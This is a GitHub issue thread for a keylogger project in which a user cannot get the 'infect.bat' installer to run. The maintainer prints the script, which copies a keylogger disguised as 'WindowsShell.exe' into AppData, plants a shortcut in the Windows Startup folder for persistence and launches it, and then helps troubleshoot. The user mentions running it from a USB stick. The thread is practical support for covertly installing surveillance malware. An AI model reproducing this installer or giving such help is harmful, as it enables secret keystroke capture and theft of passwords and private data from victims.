### ISSUE TITLE
Keylogger is really stupid, cant't install 

### ISSUE THREAD

**Issue by HershyL** [MinhasKamal/StupidKeyLogger#3]
I was able to use this keylogger a few months ago, but now when i run infect.bat it gives me [this error](http://i.imgur.com/beSG4LR.png)

**Comment by MinhasKamal** [comment]
Softwares do only that we tell them to... they are stupid... specially this one! And so we have to be smart in creating/using them :D

If you open infect.bat you will see-

``` bat
copy WindowsShell.exe %appdata%
copy WindowsShell.lnk "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsShell.lnk"
```

May you already know- the second line here copies WindowsShell.lnk in the startup folder, and the third line executes it. Problem happening in the third line while executing. 

There can be two reasons (I think)- 
1. WindowsShell.lnk is not copying properly in the startup folder. May be permission of the folder has changed.
2. Or, WindowsShell.lnk may have become hidden or the name may have changed.

See if you can solve the problem, and let me know your progress :)

**Comment by HershyL** [comment]
when i extract the zip file WindowsShell.lnk is not there..

**Comment by HershyL** [comment]
> when i extract the zip file WindowsShell.lnk is not there..

but when i download [the file](https://github.com/MinhasKamal/StupidKeylogger/blob/master/com/minhaskamal/stupidKeylogger/WindowsShell.lnk) seprately it will download as "WindowsShell.download" when i rename it to "WindowsShell.lnk" and add it to the usb it works just fine. 

so the problem is that the file is not included in the zip file. (just to make sure that we are on the same page, i downloaded [this file](https://github.com/MinhasKamal/StupidKeylogger/archive/application.zip) and the MD5 is: `eb250bc1d66b17a5607d973a1c071a55`)

**Comment by MinhasKamal** [comment]
I have checked [the link](https://github.com/MinhasKamal/StupidKeylogger/archive/application.zip) just now. Everything works perfect! And the hash is same too. May be it is a local issue.

As you have successfully run the program, I am closing the issue :)
